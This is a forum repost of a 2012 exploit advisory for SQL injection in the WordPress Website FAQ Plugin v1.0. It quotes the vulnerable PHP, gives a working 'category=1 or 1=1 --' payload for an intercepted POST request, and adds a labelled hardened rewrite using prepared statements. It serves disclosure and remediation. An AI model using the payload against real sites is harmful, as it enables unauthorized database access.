The_Arhitect Posted June 26, 2012

WordPress Website FAQ Plugin v1.0 SQL Injection

# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
# Date: 6/25/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
# Version: 1.0

==============================================================================
Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php
==============================================================================

Lines 106-115:

function displayAnswer() {
    global $wpdb;
    $master_table = $wpdb->prefix . "faq";
    $category = $_POST['category'];   // taken straight from the POST body, never validated
    $searchtxt = $_POST['searchtxt']; // likewise unsanitized
    if($category!=0) {
        // $category is concatenated unquoted into the WHERE clause; $searchtxt lands inside the LIKE pattern
        $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'";
    }
    // remainder of the function is not shown in the advisory
}

===============================================================
Vulnerability Details: faq_category vulnerable to SQL injection
===============================================================

When submitting a query via the widget, intercept the POST request via Burp or another proxy to find the following:

action=displayAnswer&category=1&searchtxt=[your query]

Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of the searchtxt value.

Source: WordPress Website FAQ Plugin v1.0 SQL Injection
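For comparison, a hardened version of the same function, added here as an example (it is not the plugin's code or the advisory author's): the query goes through $wpdb->prepare() with typed placeholders and the search term through $wpdb->esc_like(). The else branch and the use of absint(), sanitize_text_field() and wp_unslash() are assumptions about what the rest of the function should do, since the advisory only shows the if branch.

```php
<?php
// Added example, not the plugin's code. Assumes a WordPress context:
// the global $wpdb plus core helpers absint(), sanitize_text_field(),
// wp_unslash(), $wpdb->prepare() and $wpdb->esc_like().
//
// Vulnerable pattern from the advisory (for comparison only):
//   $sql = "SELECT * FROM $master_table WHERE faq_category=" . $category
//        . " AND faq_question LIKE '%" . $searchtxt . "%'";
// $category is concatenated unquoted, so a value like "1 or 1=1 --" becomes
// part of the WHERE clause and the rest of the query is commented out.

function displayAnswerHardened() {
    global $wpdb;
    // Table name is built from the configured prefix, not from the request,
    // so interpolating it is safe.
    $master_table = $wpdb->prefix . 'faq';

    // Coerce the category to a non-negative integer; non-numeric input becomes 0.
    $category = isset( $_POST['category'] ) ? absint( $_POST['category'] ) : 0;

    // Normalise the search text; actual SQL escaping is done by prepare() below.
    $searchtxt = isset( $_POST['searchtxt'] )
        ? sanitize_text_field( wp_unslash( $_POST['searchtxt'] ) )
        : '';

    // esc_like() escapes the LIKE wildcards % and _ so user input cannot
    // widen the match; the surrounding % are added deliberately here.
    $like = '%' . $wpdb->esc_like( $searchtxt ) . '%';

    if ( $category !== 0 ) {
        // %d forces an integer, %s is quoted and escaped by prepare();
        // no user-controlled string is ever concatenated into the SQL.
        $sql = $wpdb->prepare(
            "SELECT * FROM {$master_table} WHERE faq_category = %d AND faq_question LIKE %s",
            $category,
            $like
        );
    } else {
        // Assumed behaviour (not shown in the advisory): category 0 searches all categories.
        $sql = $wpdb->prepare(
            "SELECT * FROM {$master_table} WHERE faq_question LIKE %s",
            $like
        );
    }

    return $wpdb->get_results( $sql );
}
```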
skr3ch69 Posted July 3, 2012

...very useful. Thanks.